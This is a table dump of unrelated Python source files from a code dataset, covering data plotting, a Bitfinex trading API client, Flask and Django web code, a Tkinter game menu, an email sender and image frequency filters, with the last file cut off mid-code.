index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
21,900 | ad9282007a0e2fe99ac07c4833291ad589917c93 | #seaborn visualizations. helps visualizations / chart creations in fewer lines as compared to matplotlib
import seaborn as sns
sns.set(style='darkgrid')
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import warnings
warnings.filterwarnings('ignore')
data_BM = pd.read_csv(r"C:\Users\vasudevan.gopalan\OneDrive - GAVS Technologies Private Limited\Knowledge Repository\Python\bigmart_data.csv")
#drop null values. Removes rows that has any columns as null
data_BM = data_BM.dropna(how='any')
#multiply by 100 to increase the size, to look better in chart
data_BM['Visibility_Scaled']=data_BM['Item_Visibility']*100
print(data_BM.head())
#line chart
sns.lineplot(x='Item_Weight',y='Item_MRP',data=data_BM[:50])
#use plt show command to display the chart in VS editor itself.
#Since seaborn is built on top of plt, it works this way
plt.show()
#bar chart
sns.barplot(x='Item_Type',y='Item_MRP',data=data_BM[:10])
plt.show()
#histogram
sns.distplot(data_BM['Item_MRP'])
plt.show()
#box plot
sns.boxplot(data_BM['Item_Outlet_Sales'], orient='vertical')
plt.show()
#violin plot
sns.violinplot(data_BM['Item_Outlet_Sales'], orient='vertical', color='magenta')
plt.show()
#scatter plot
sns.relplot(x='Item_MRP',y='Item_Outlet_Sales',data=data_BM[:200],kind='scatter')
plt.show()
#scatter plot with hue semantic. hue gives the 3rd dimension
sns.relplot(x='Item_MRP',y='Item_Outlet_Sales',data=data_BM[:200], hue='Item_Type')
plt.show()
#line plot for different categories of the outlet size. use hue
sns.lineplot(x='Item_Weight',y='Item_MRP',hue='Outlet_Size',data=data_BM[:150])
plt.show()
#bubble plot
sns.relplot(x='Item_MRP',y='Item_Outlet_Sales',data=data_BM[:200], kind='scatter', size='Visibility_Scaled', hue='Visibility_Scaled')
plt.show()
#subplots
sns.relplot(x='Item_Weight',y='Item_Visibility',hue='Outlet_Size', style='Outlet_Size', col='Outlet_Size', data=data_BM[:150])
plt.show() |
21,901 | 2b9bdf77a7e31978d1f81e076c086ac44381af60 | #!/bin/python3
from multiprocessing import SimpleQueue
import queue
import register
import json
import time
# The procedure to send a msg to another node (write in its queue)
# Arguments :
# - q_ : the queue to send in
# - sender : the id of the sender
# - receiver : the id of the receiver (need to write in file)
# - name : the type of the message
# - val1 : the fist value to send
# - val2 : the second value to send
# - val3 : the third value to send
# - f_ : the name of the file to register msg in
# Returns : None
def send_to(q_, sender, receiver, name, val1, val2, val3, f_):
obj = {
"type" : name,
"val1" : val1,
"val2" : val2,
"val3" : val3,
"sender" : sender
}
q_.put(json.dumps(obj))
register.send_msg(sender, receiver, name, val1, val2, val3, f_)
# The fct to receive a msg from another node (read in queue)
# Arguments :
# - q_ : the queue to read in
# - receiver : the id of the receiver (the one who reads in queue)
# - f_ : the name of the file to register msg in
# Returns :
# - {"type":_, "val1":_, "val2":_, "val3":_}
def recv_from(q_, receiver, f_):
obj = json.loads(q_.get())
register.recv_msg(obj["sender"], receiver, obj["type"], obj["val1"], obj["val2"], obj["val3"], f_)
return obj
|
21,902 | 63d8a82504b1e0f4549f6419cde1502dba0e5cde | #!/usr/bin/env python
import csv #importing the csv module
txtfile=open("REST_Curl_Log Component.txt",'w') #opening a file in read mode
entry=" " #an empty string
while entry.upper()!='QUIT': #getting user input unless he types 'quit'
entry=str(input('Write something to file in a Name, age format')) #have the input in entry
if entry=='quit' or QUIT:
break #break from loop if quit pressed
else:
txtfile.write(str(entry)+'\n') #writing the entry to the file with a new line after each entry
txtfile.close() #closing the file for saving the values
txtfile=open('REST_Curl_Log Component.txt','r') #opening the file again in read mode
data=txtfile.readlines() #readine the data line by line
print (data)
with open ('anewfile.csv','w') as csvfile: #created a csv file and say it csvfile in the program
writer=csv.writer(csvfile,delimiter='\n', quoting=csv.QUOTE_ALL) #this is the default csv writer. we have the csv file name, the delimiter which is in our case is newline character and quoting to say to quote all the inputs, don't care if the value is numeric or not.
for line in data: #Getting to each line of the data
line=line.split() #splitting the data by white space
# print line
writer.writerow(line) #write line to csv file as row basis
csvfile.close() #closing the file
print ("Successfully Done")
f=open('anewfile.csv','r') #Opening the csv file
rows=csv.reader(f) #read the content to rows
for line in rows : #display each row
print (line)
|
21,903 | bc564b6dde540b0f4190bf9c0f46c51991b8a1a8 | import base64
import hashlib
import hmac
import json
import re
import time
import datetime
import numpy as np
import pandas as pd
import pytz
import requests
import six
from catalyst.assets._assets import TradingPair
from logbook import Logger
from catalyst.exchange.exchange import Exchange
from catalyst.exchange.exchange_bundle import ExchangeBundle
from catalyst.exchange.exchange_errors import (
ExchangeRequestError,
InvalidHistoryFrequencyError,
InvalidOrderStyle, OrderCancelError)
from catalyst.exchange.exchange_execution import ExchangeLimitOrder, \
ExchangeStopLimitOrder, ExchangeStopOrder
from catalyst.finance.order import Order, ORDER_STATUS
from catalyst.protocol import Account
from catalyst.exchange.exchange_utils import get_exchange_symbols_filename, \
download_exchange_symbols
# Trying to account for REST api instability
# https://stackoverflow.com/questions/15431044/can-i-set-max-retries-for-requests-request
requests.adapters.DEFAULT_RETRIES = 20
BITFINEX_URL = 'https://api.bitfinex.com'
from catalyst.constants import LOG_LEVEL
log = Logger('Bitfinex', level=LOG_LEVEL)
warning_logger = Logger('AlgoWarning')
class Bitfinex(Exchange):
def __init__(self, key, secret, base_currency, portfolio=None):
self.url = BITFINEX_URL
self.key = key
self.secret = secret.encode('UTF-8')
self.name = 'bitfinex'
self.color = 'green'
self.assets = {}
self.load_assets()
self.base_currency = base_currency
self._portfolio = portfolio
self.minute_writer = None
self.minute_reader = None
# The candle limit for each request
self.num_candles_limit = 1000
# Max is 90 but playing it safe
# https://www.bitfinex.com/posts/188
self.max_requests_per_minute = 80
self.request_cpt = dict()
self.bundle = ExchangeBundle(self)
def _request(self, operation, data, version='v1'):
payload_object = {
'request': '/{}/{}'.format(version, operation),
'nonce': '{0:f}'.format(time.time() * 1000000),
# convert to string
'options': {}
}
if data is None:
payload_dict = payload_object
else:
payload_dict = payload_object.copy()
payload_dict.update(data)
payload_json = json.dumps(payload_dict)
if six.PY3:
payload = base64.b64encode(bytes(payload_json, 'utf-8'))
else:
payload = base64.b64encode(payload_json)
m = hmac.new(self.secret, payload, hashlib.sha384)
m = m.hexdigest()
# headers
headers = {
'X-BFX-APIKEY': self.key,
'X-BFX-PAYLOAD': payload,
'X-BFX-SIGNATURE': m
}
if data is None:
request = requests.get(
'{url}/{version}/{operation}'.format(
url=self.url,
version=version,
operation=operation
), data={},
headers=headers)
else:
request = requests.post(
'{url}/{version}/{operation}'.format(
url=self.url,
version=version,
operation=operation
),
headers=headers)
return request
def _get_v2_symbol(self, asset):
pair = asset.symbol.split('_')
symbol = 't' + pair[0].upper() + pair[1].upper()
return symbol
def _get_v2_symbols(self, assets):
"""
Workaround to support Bitfinex v2
TODO: Might require a separate asset dictionary
:param assets:
:return:
"""
v2_symbols = []
for asset in assets:
v2_symbols.append(self._get_v2_symbol(asset))
return v2_symbols
def _create_order(self, order_status):
"""
Create a Catalyst order object from a Bitfinex order dictionary
:param order_status:
:return: Order
"""
if order_status['is_cancelled']:
status = ORDER_STATUS.CANCELLED
elif not order_status['is_live']:
log.info('found executed order {}'.format(order_status))
status = ORDER_STATUS.FILLED
else:
status = ORDER_STATUS.OPEN
amount = float(order_status['original_amount'])
filled = float(order_status['executed_amount'])
if order_status['side'] == 'sell':
amount = -amount
filled = -filled
price = float(order_status['price'])
order_type = order_status['type']
stop_price = None
limit_price = None
# TODO: is this comprehensive enough?
if order_type.endswith('limit'):
limit_price = price
elif order_type.endswith('stop'):
stop_price = price
executed_price = float(order_status['avg_execution_price'])
# TODO: bitfinex does not specify comission. I could calculate it but not sure if it's worth it.
commission = None
date = pd.Timestamp.utcfromtimestamp(float(order_status['timestamp']))
date = pytz.utc.localize(date)
order = Order(
dt=date,
asset=self.assets[order_status['symbol']],
amount=amount,
stop=stop_price,
limit=limit_price,
filled=filled,
id=str(order_status['id']),
commission=commission
)
order.status = status
return order, executed_price
def get_balances(self):
log.debug('retrieving wallets balances')
try:
self.ask_request()
response = self._request('balances', None)
balances = response.json()
except Exception as e:
raise ExchangeRequestError(error=e)
if 'message' in balances:
raise ExchangeRequestError(
error='unable to fetch balance {}'.format(balances['message'])
)
std_balances = dict()
for balance in balances:
currency = balance['currency'].lower()
std_balances[currency] = float(balance['available'])
return std_balances
@property
def account(self):
account = Account()
account.settled_cash = None
account.accrued_interest = None
account.buying_power = None
account.equity_with_loan = None
account.total_positions_value = None
account.total_positions_exposure = None
account.regt_equity = None
account.regt_margin = None
account.initial_margin_requirement = None
account.maintenance_margin_requirement = None
account.available_funds = None
account.excess_liquidity = None
account.cushion = None
account.day_trades_remaining = None
account.leverage = None
account.net_leverage = None
account.net_liquidation = None
return account
@property
def time_skew(self):
# TODO: research the time skew conditions
return pd.Timedelta('0s')
def get_account(self):
# TODO: fetch account data and keep in cache
return None
def get_candles(self, data_frequency, assets, bar_count=None,
start_dt=None, end_dt=None):
"""
Retrieve OHLVC candles from Bitfinex
:param data_frequency:
:param assets:
:param bar_count:
:return:
Available Frequencies
---------------------
'1m', '5m', '15m', '30m', '1h', '3h', '6h', '12h', '1D', '7D', '14D',
'1M'
"""
freq_match = re.match(r'([0-9].*)(m|h|d)', data_frequency, re.M | re.I)
if freq_match:
number = int(freq_match.group(1))
unit = freq_match.group(2)
if unit == 'd':
converted_unit = 'D'
else:
converted_unit = unit
frequency = '{}{}'.format(number, converted_unit)
allowed_frequencies = ['1m', '5m', '15m', '30m', '1h', '3h', '6h',
'12h', '1D', '7D', '14D', '1M']
if frequency not in allowed_frequencies:
raise InvalidHistoryFrequencyError(
frequency=data_frequency
)
elif data_frequency == 'minute':
frequency = '1m'
elif data_frequency == 'daily':
frequency = '1D'
else:
raise InvalidHistoryFrequencyError(
frequency=data_frequency
)
# Making sure that assets are iterable
asset_list = [assets] if isinstance(assets, TradingPair) else assets
ohlc_map = dict()
for asset in asset_list:
symbol = self._get_v2_symbol(asset)
url = '{url}/v2/candles/trade:{frequency}:{symbol}'.format(
url=self.url,
frequency=frequency,
symbol=symbol
)
if bar_count:
is_list = True
url += '/hist?limit={}'.format(int(bar_count))
def get_ms(date):
epoch = datetime.datetime.utcfromtimestamp(0)
epoch = epoch.replace(tzinfo=pytz.UTC)
return (date - epoch).total_seconds() * 1000.0
if start_dt is not None:
start_ms = get_ms(start_dt)
url += '&start={0:f}'.format(start_ms)
if end_dt is not None:
end_ms = get_ms(end_dt)
url += '&end={0:f}'.format(end_ms)
else:
is_list = False
url += '/last'
try:
self.ask_request()
response = requests.get(url)
except Exception as e:
raise ExchangeRequestError(error=e)
if 'error' in response.content:
raise ExchangeRequestError(
error='Unable to retrieve candles: {}'.format(
response.content)
)
candles = response.json()
def ohlc_from_candle(candle):
last_traded = pd.Timestamp.utcfromtimestamp(
candle[0] / 1000.0)
last_traded = last_traded.replace(tzinfo=pytz.UTC)
ohlc = dict(
open=np.float64(candle[1]),
high=np.float64(candle[3]),
low=np.float64(candle[4]),
close=np.float64(candle[2]),
volume=np.float64(candle[5]),
price=np.float64(candle[2]),
last_traded=last_traded
)
return ohlc
if is_list:
ohlc_bars = []
# We can to list candles from old to new
for candle in reversed(candles):
ohlc = ohlc_from_candle(candle)
ohlc_bars.append(ohlc)
ohlc_map[asset] = ohlc_bars
else:
ohlc = ohlc_from_candle(candles)
ohlc_map[asset] = ohlc
return ohlc_map[assets] \
if isinstance(assets, TradingPair) else ohlc_map
def create_order(self, asset, amount, is_buy, style):
"""
Creating order on the exchange.
:param asset:
:param amount:
:param is_buy:
:param style:
:return:
"""
exchange_symbol = self.get_symbol(asset)
if isinstance(style, ExchangeLimitOrder) \
or isinstance(style, ExchangeStopLimitOrder):
price = style.get_limit_price(is_buy)
order_type = 'limit'
elif isinstance(style, ExchangeStopOrder):
price = style.get_stop_price(is_buy)
order_type = 'stop'
else:
raise InvalidOrderStyle(exchange=self.name,
style=style.__class__.__name__)
req = dict(
symbol=exchange_symbol,
amount=str(float(abs(amount))),
price="{:.20f}".format(float(price)),
side='buy' if is_buy else 'sell',
type='exchange ' + order_type, # TODO: support margin trades
exchange=self.name,
is_hidden=False,
is_postonly=False,
use_all_available=0,
ocoorder=False,
buy_price_oco=0,
sell_price_oco=0
)
date = pd.Timestamp.utcnow()
try:
self.ask_request()
response = self._request('order/new', req)
order_status = response.json()
except Exception as e:
raise ExchangeRequestError(error=e)
if 'message' in order_status:
raise ExchangeRequestError(
error='unable to create Bitfinex order {}'.format(
order_status['message'])
)
order_id = str(order_status['id'])
order = Order(
dt=date,
asset=asset,
amount=amount,
stop=style.get_stop_price(is_buy),
limit=style.get_limit_price(is_buy),
id=order_id
)
return order
def get_open_orders(self, asset=None):
"""Retrieve all of the current open orders.
Parameters
----------
asset : Asset
If passed and not None, return only the open orders for the given
asset instead of all open orders.
Returns
-------
open_orders : dict[list[Order]] or list[Order]
If no asset is passed this will return a dict mapping Assets
to a list containing all the open orders for the asset.
If an asset is passed then this will return a list of the open
orders for this asset.
"""
try:
self.ask_request()
response = self._request('orders', None)
order_statuses = response.json()
except Exception as e:
raise ExchangeRequestError(error=e)
if 'message' in order_statuses:
raise ExchangeRequestError(
error='Unable to retrieve open orders: {}'.format(
order_statuses['message'])
)
orders = []
for order_status in order_statuses:
order, executed_price = self._create_order(order_status)
if asset is None or asset == order.sid:
orders.append(order)
return orders
def get_order(self, order_id):
"""Lookup an order based on the order id returned from one of the
order functions.
Parameters
----------
order_id : str
The unique identifier for the order.
Returns
-------
order : Order
The order object.
"""
try:
self.ask_request()
response = self._request(
'order/status', {'order_id': int(order_id)})
order_status = response.json()
except Exception as e:
raise ExchangeRequestError(error=e)
if 'message' in order_status:
raise ExchangeRequestError(
error='Unable to retrieve order status: {}'.format(
order_status['message'])
)
return self._create_order(order_status)
def cancel_order(self, order_param):
"""Cancel an open order.
Parameters
----------
order_param : str or Order
The order_id or order object to cancel.
"""
order_id = order_param.id \
if isinstance(order_param, Order) else order_param
try:
self.ask_request()
response = self._request('order/cancel', {'order_id': order_id})
status = response.json()
except Exception as e:
raise ExchangeRequestError(error=e)
if 'message' in status:
raise OrderCancelError(
order_id=order_id,
exchange=self.name,
error=status['message']
)
def tickers(self, assets):
"""
Fetch ticket data for assets
https://docs.bitfinex.com/v2/reference#rest-public-tickers
:param assets:
:return:
"""
symbols = self._get_v2_symbols(assets)
log.debug('fetching tickers {}'.format(symbols))
try:
self.ask_request()
response = requests.get(
'{url}/v2/tickers?symbols={symbols}'.format(
url=self.url,
symbols=','.join(symbols),
)
)
except Exception as e:
raise ExchangeRequestError(error=e)
if 'error' in response.content:
raise ExchangeRequestError(
error='Unable to retrieve tickers: {}'.format(
response.content)
)
try:
tickers = response.json()
except Exception as e:
raise ExchangeRequestError(error=e)
ticks = dict()
for index, ticker in enumerate(tickers):
if not len(ticker) == 11:
raise ExchangeRequestError(
error='Invalid ticker in response: {}'.format(ticker)
)
ticks[assets[index]] = dict(
timestamp=pd.Timestamp.utcnow(),
bid=ticker[1],
ask=ticker[3],
last_price=ticker[7],
low=ticker[10],
high=ticker[9],
volume=ticker[8],
)
log.debug('got tickers {}'.format(ticks))
return ticks
def generate_symbols_json(self, filename=None, source_dates=False):
symbol_map = {}
if not source_dates:
fn, r = download_exchange_symbols(self.name)
with open(fn) as data_file:
cached_symbols = json.load(data_file)
response = self._request('symbols', None)
for symbol in response.json():
if (source_dates):
start_date = self.get_symbol_start_date(symbol)
else:
try:
start_date = cached_symbols[symbol]['start_date']
except KeyError as e:
start_date = time.strftime('%Y-%m-%d')
try:
end_daily = cached_symbols[symbol]['end_daily']
except KeyError as e:
end_daily = 'N/A'
try:
end_minute = cached_symbols[symbol]['end_minute']
except KeyError as e:
end_minute = 'N/A'
symbol_map[symbol] = dict(
symbol=symbol[:-3] + '_' + symbol[-3:],
start_date=start_date,
end_daily=end_daily,
end_minute=end_minute,
)
if (filename is None):
filename = get_exchange_symbols_filename(self.name)
with open(filename, 'w') as f:
json.dump(symbol_map, f, sort_keys=True, indent=2,
separators=(',', ':'))
def get_symbol_start_date(self, symbol):
print(symbol)
symbol_v2 = 't' + symbol.upper()
"""
For each symbol we retrieve candles with Monhtly resolution
We get the first month, and query again with daily resolution
around that date, and we get the first date
"""
url = '{url}/v2/candles/trade:1M:{symbol}/hist'.format(
url=self.url,
symbol=symbol_v2
)
try:
self.ask_request()
response = requests.get(url)
except Exception as e:
raise ExchangeRequestError(error=e)
"""
If we don't get any data back for our monthly-resolution query
it means that symbol started trading less than a month ago, so
arbitrarily set the ref. date to 15 days ago to be safe with
+/- 31 days
"""
if (len(response.json())):
startmonth = response.json()[-1][0]
else:
startmonth = int((time.time() - 15 * 24 * 3600) * 1000)
"""
Query again with daily resolution setting the start and end around
the startmonth we got above. Avoid end dates greater than now: time.time()
"""
url = '{url}/v2/candles/trade:1D:{symbol}/hist?start={start}&end={end}'.format(
url=self.url,
symbol=symbol_v2,
start=startmonth - 3600 * 24 * 31 * 1000,
end=min(startmonth + 3600 * 24 * 31 * 1000,
int(time.time() * 1000))
)
try:
self.ask_request()
response = requests.get(url)
except Exception as e:
raise ExchangeRequestError(error=e)
return time.strftime('%Y-%m-%d',
time.gmtime(int(response.json()[-1][0] / 1000)))
def get_orderbook(self, asset, order_type='all', limit=100):
exchange_symbol = asset.exchange_symbol
try:
self.ask_request()
# TODO: implement limit
response = self._request(
'book/{}'.format(exchange_symbol), None)
data = response.json()
except Exception as e:
raise ExchangeRequestError(error=e)
# TODO: filter by type
result = dict()
for order_type in data:
result[order_type] = []
for entry in data[order_type]:
result[order_type].append(dict(
rate=float(entry['price']),
quantity=float(entry['amount'])
))
return result
|
21,904 | 8593dab08a7b48d2a1912c030291fb105a32f000 | """
Base class for data structures
"""
from tools.xl import read_dframe
class Block:
def __init__(self, *args, **kwargs):
# set properties
# named args first
for p in self.props_v:
val = kwargs.get(p, None)
setattr(self, p, val)
# now reset if unnamed exist
for i, val in enumerate(args):
setattr(self, self.props_v[i], val)
# List props
for p in self.props_l:
setattr(self, p, [])
# List props
for p in self.props_d:
setattr(self, p, {})
def __repr__(self):
cname = type(self).__name__
values = [p + " = " + str(getattr(self, p)) for p in self.props_v]
params = ", ".join(values)
return '{0}({1})'.format(cname, params)
@classmethod
def get_props(cls, props):
cls.props_v = props.get("V", [])
cls.props_l = props.get("L", [])
cls.props_d = props.get("D", [])
@classmethod
def prepare(cls, all_props):
cls.get_props(all_props[cls.__name__])
@classmethod
def aggregate(cls, *args):
key = args[0]
obj = dict(zip(cls.props_v, args))
return (key, obj)
@classmethod
def pcs_input(cls, **kwargs):
#from tools.xl import read_file
#_, rows = read_file(kwargs['fname'])
_, rows = read_dframe(kwargs['fname'])
obj_info = {}
for row in rows:
key, obj = cls.pcs_row(row)
#key, obj = cls.pcs_row(*row)
obj_info[key] = obj
return obj_info
|
21,905 | c471e6217ab632ac29c6a89df64e8c2067377364 | from flask import Flask, render_template, url_for
from flask_mysqldb import MySQL
import pickle
import yaml
# Read model
def output_recommendations(book_name):
with open('saved_model.pkl', 'rb') as saved_model:
loaded_model = pickle.load(saved_model)
book_list = loaded_model.corpus_recommendations(book_name)
return book_list
# Get details of recommended books
def get_details(book_list):
img_list = {}
cur = mysql.connection.cursor()
for book in book_list:
resultValue = cur.execute("SELECT image_url FROM books WHERE title = %s LIMIT 1", (book,))
if resultValue > 0:
img = str(cur.fetchall())
img_list[book] = img[3:-5]
else:
img_list[book] = None
return img_list
app = Flask(__name__)
db = yaml.load(open('db.yaml'))
# Configure DB
app.config['MYSQL_HOST'] = db['mysql_host']
app.config['MYSQL_USER'] = db['mysql_user']
app.config['MYSQL_PASSWORD'] = db['mysql_password']
app.config['MYSQL_DB'] = db['mysql_db']
app.config['MYSQL_PORT'] = db['mysql_port']
mysql = MySQL(app)
@app.route('/')
@app.route('/books')
def books():
cur = mysql.connection.cursor()
resultValue = cur.execute("SELECT * FROM books")
if resultValue > 0:
books = cur.fetchall()
return render_template('testbooks.html', books = books)
@app.route('/book_details/<book_title>')
def book_details(book_title):
cur = mysql.connection.cursor()
resultValue = cur.execute("SELECT * FROM books WHERE title = %s LIMIT 1", (book_title,))
if resultValue > 0:
rec_book_list = output_recommendations(book_title)
book = cur.fetchall()
recom_books_details = get_details(rec_book_list)
return render_template('book_details.html', book = book, book_dict = recom_books_details)
return 'No book'
if __name__ == '__main__':
app.run(debug=True) |
21,906 | 0cb306b986311933e2dfe2b5794c9f0beae886c5 | import json, multiprocessing.pool, sys
import requests
ids = []
def make_request(id):
return requests.get("https://fftbg.com/api/tournament/" + str(id))
with open(sys.argv[1]) as in_f:
for line in in_f:
ids.append(json.loads(line)['ID'])
with multiprocessing.pool.ThreadPool(12) as p:
tournaments = p.map(make_request, ids)
for t in tournaments:
print(json.dumps(t.json()))
|
21,907 | 1f326501b7104cbb70fcf677c9937669cbdd5a1b | class Solution:
def rob(self, nums) -> int:
n = len(nums)
sols = [0] * (n + 1)
sols[1] = nums[0]
for i in range(2, n + 1):
sols[i] = max(sols[i - 2] + nums[i - 1], sols[i - 1])
return sols[-1]
|
21,908 | 1202ad05def9d92e4acdce8f53f1a9ba5b745dd3 | # -*- coding:utf-8 -*-
# 发送纯文本邮件
from quickmail import QuickEmail
# 创建一个qe实例
qe = QuickEmail()
# 设置邮件接收列表
qe.add_tolist(['2838654353@qq.com'])
# 设置邮件内容,邮件默认是纯文本邮件
qe.set_mail('标题:测试邮件', '这是一个纯文本邮件 sent by quickEmail', mail_type='plain')
# 发送邮件
qe.send_mail(ssl=True)
|
21,909 | 7b715fa289ff4791d2feb9386693ffb95fc3c706 | from database import Database
from models.post import Post
Database.initialize()
post = Post("Post1 title", "Post1 content", "Post1 author")
print(post.content)
print(post.author)
|
21,910 | 6d2eb0f2cb00d62625f5fd1d3533621a7c069d4d |
from rest_framework.schemas import AutoSchema
from django.conf import settings
import requests
import json
class CustomSchema(AutoSchema):
schema_list = []
schema_create = []
schema_retrieve = []
schema_update = []
schema_partial_update = []
schema_delete = []
def __init__(self, schema):
super(CustomSchema, self).__init__(None)
if 'list' in schema:
self.schema_list = schema['list']
if 'create' in schema:
self.schema_create = schema['create']
if 'retrieve' in schema:
self.schema_retrieve = schema['retrieve']
if 'update' in schema:
self.schema_update = schema['update']
if 'partial_update' in schema:
self.schema_partial_update = schema['partial_update']
if 'delete' in schema:
self.schema_delete = schema['delete']
def is_list(self, path, method):
return method == 'GET' and not '{id}' in path
def is_create(self, path, method):
return method == 'POST' and not '{id}' in path
def is_retrieve(self, path, method):
return method == 'GET' and '{id}' in path
def is_update(self, path, method):
return method == 'PUT' and '{id}' in path
def is_partial_update(self, path, method):
return method == 'PATCH' and '{id}' in path
def is_delete(self, path, method):
return method == 'DELETE' and '{id}' in path
def get_manual_fields(self, path, method):
super().get_manual_fields(path, method)
if self.is_list(path, method):
return self.schema_list
elif self.is_create(path, method):
return self.schema_create
elif self.is_retrieve(path, method):
return self.schema_retrieve
elif self.is_update(path, method):
return self.schema_update
elif self.is_partial_update(path, method):
return self.schema_partial_update
elif self.is_delete(path, method):
return self.schema_delete
def send_fcm(device, notification=None, data=None):
url = 'https://fcm.googleapis.com/fcm/send'
if device.fcm_token == 'noToken': return
headers = {
'Authorization': 'key=%s'%settings.FCM_SERVER_KEY,
'Content-Type': 'application/json; UTF-8',
}
content = {
'to':device.fcm_token
}
if notification:
content['notification'] = notification
if data:
content['data'] = data
r = requests.post(url, data=json.dumps(content), headers=headers)
result = json.loads(r.text)
if result['success'] == 0:
device.delete() |
21,911 | 496727dbee04bd9c7232b52955a5245f0e649f2f | # Generated by Django 2.1.5 on 2019-02-07 21:54
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('Staff', '0007_auto_20190206_1854'),
]
operations = [
migrations.AlterField(
model_name='doctor',
name='email',
field=models.EmailField(max_length=70, unique=True),
),
migrations.AlterField(
model_name='doctor',
name='image',
field=models.ImageField(default='default.jpg', upload_to='profile_pics'),
),
]
|
21,912 | 27e6eef2b22248a90282f2f2c3dd952671d29036 | #--------------------------------Imports---------------------------------------#
try: import Tkinter as Tk
except ImportError: import tkinter as Tk
import os
if False:
import gameScreen
#------------------------------Root--------------------------------------------#
root = Tk.Tk()
root.title("Forbidden Island")
root.attributes("-fullscreen", True)
root.update()
WIDTH = int(root.winfo_screenwidth())
HEIGHT = int(root.winfo_screenheight())
welcomeFrame = Tk.Frame(root, width=WIDTH, height=HEIGHT)
welcomeFrame.pack(anchor=Tk.CENTER)
#----------------------------------Functions-----------------------------------#
def play_the_game():
welcomeFrame.destroy()
# TODO: Brings down options for
def open_rulebook():
os.chdir("./Assets")
os.startfile("ForbiddenIslandTM-RULES.pdf")
"""def canvasEvent(e):
def isInBox(e, x1,y1, x2,y2):
return False
if isInBox(e, 100,100, 125,125):
play_the_game()
elif isInBox(e, 150,150, 175,175):
open_rulebook()
else:
print("Invalid pos")
print(e.keysym)"""
#-------------------------------Background Image-------------------------------#
canvas = Tk.Canvas(welcomeFrame)
canvas.place(relx=0, rely=0, relwidth=1.0, relheight=1.0)
bgImg = Tk.PhotoImage(file="Assets/new_background.png") # 1024x715
# TODO: Resize later in photoshop
canvas.create_image(WIDTH//2, HEIGHT//2, image=bgImg)
#------------------------------------Buttons-----------------------------------#
#playRect = canvas.create_rectangle(100,100, 150,150, tags=["action", "play"])
#ruleRect = canvas.create_rectangle(200,200, 250,250, tags=["action", "rules"])
#canvas.tag_bind(playRect, "<Button-1>", play_the_game)
#canvas.tag_bind(ruleRect, "<Button-1>", open_rulebook)
#canvas.bind("<Button-1>", canvasEvent)
play_button = Tk.Button(welcomeFrame, text="Play", command=play_the_game)
play_button.place(relx=0.5,rely=0.5 , relwidth=0.1,relheight=0.1) # Align up with img
rulebook_button = Tk.Button(welcomeFrame, text="Rulebook", command=open_rulebook)
rulebook_button.place(relx=0.5,rely=0.8 , relwidth=0.1,relheight=0.1) # Align up with img
#difficulty = Tk.StringVar(welcomeFrame)
#difficulty.set("Novice")
#difficulty_button = Tk.OptionMenu(welcomeFrame, difficulty, "Novice", "Normal", "Elite", "Legendary")
#difficulty_button.place(relx=0.33,rely=0.67 , relwidth=0.1,relheight=0.08)
#------------------------------Main Program------------------------------------#
root.mainloop()
|
21,913 | b9ea69c65c822047a61bd587f2a2d2e49589715e | import numpy as np
import matplotlib.pyplot as plt
from utils import draw_picture
"""
作业3:
在网上寻找一张福州大学校园图像,并将之转换为灰度图像,完成以下题目:
1编程实现陷波滤波器,对该图进行频率域滤波。
2编程实现巴特沃思低通滤波器,对该图进行图像滤波。
3编程实现理想低通滤波器,对该图进行图像滤波,并分析一下振铃现象。
将程序代码和实验结果图上传。编程语言不限。
https://www.icourse163.org/spoc/learn/FZU-1462424162?tid=1463209447#/learn/content?type=detail&id=1242343011&cid=1265276221
"""
def log_img(image):
return np.log(1 + np.abs(image))
class Filter():
def __init__(self, img):
self.img = img
def _notch_kernel(self, d0=1000):
"""
理想陷波带阻滤波器
"""
r, c = self.img.shape
u0, v0 = 0, c/8
h = np.empty((r, c, ))
for u in range(r):
for v in range(c):
d1 = (u-r/2-u0)**2 + (v-c/2-v0)**2
d2 = (u-r/2+u0)**2 + (v-c/2+v0)**2
# 挖去的两个点偏移了(u0, v0)
h[u, v] = int(min(d1, d2) >= d0)
return h
def _butterworth_kernel(self, d0=42):
"""
巴特沃斯低通滤波器
"""
r, c = self.img.shape
n = 2
h = np.empty((r, c, ))
k = n<<1
for u in range(r):
for v in range(c):
d = np.sqrt((u - r/2)**2 + (v - c/2)**2)
# 挖去的两个点偏移了(u0, v0)
h[u, v] = 1 / (1 + d/d0)**k
return h
def _ideal_lowpass_kernel(self, d0=33):
"""
理想低通滤波器
"""
r, c = self.img.shape
# d0 = 33 # 35, 36分界线
h = np.empty((r, c, ))
for u in range(r):
for v in range(c):
d = np.sqrt((u - r/2)**2 + (v - c/2)**2)
# 挖去的两个点偏移了(u0, v0)
h[u, v] = int(d <= d0)
return h
def run(self, method: str) -> tuple:
kernel = f'_{method}_kernel'
if not hasattr(self, kernel):
raise NotImplementedError('不存在该种滤波器')
f = np.fft.fft2(self.img)
f_shift = np.fft.fftshift(f)
# f_shift_h = f_shift * self._notch_kernel()
f_shift_h = f_shift * getattr(self, kernel)()
f_h = np.fft.ifftshift(f_shift_h)
img_h = np.fft.ifft2(f_h)
return f_shift, f_shift_h, img_h
def ringing_effect(self, d0: int):
f_shift_h = self._ideal_lowpass_kernel(d0)
f_h = np.fft.ifftshift(f_shift_h)
h = np.fft.ifft2(f_h)
return f_shift_h, h
def main():
img = plt.imread('boy_L.jpg')
# 对带噪声的图片滤波效果更加明显,有针对性
# img = plt.imread('Fzu_shutong_L.jpg')
filters = Filter(img)
# draw = draw_picture(2, 2)
# plt.figure(figsize=(10, 6))
# f_shift, f_shift_h, img_h = filters.run('notch')
# draw(1, img, '原图')
# draw(2, log_img(f_shift), '频率域')
# draw(3, log_img(f_shift_h), 'NF滤波后频率域')
# draw(4, log_img(img_h), 'NF滤波后空间域')
# plt.savefig('Fzu_shutong_L_notch.jpg')
# plt.show()
# plt.figure(figsize=(10, 6))
# f_shift, f_shift_h, img_h = filters.run('butterworth')
# draw(1, img, '原图')
# draw(2, log_img(f_shift), '频率域')
# draw(3, log_img(f_shift_h), 'BLPF滤波后频率域')
# draw(4, log_img(img_h), 'BLPF滤波后空间域')
# plt.savefig('Fzu_shutong_L_butterworth.jpg')
# plt.show()
# plt.figure(figsize=(10, 6))
# f_shift, f_shift_h, img_h = filters.run('ideal_lowpass')
# draw(1, img, '原图')
# draw(2, log_img(f_shift), '频率域')
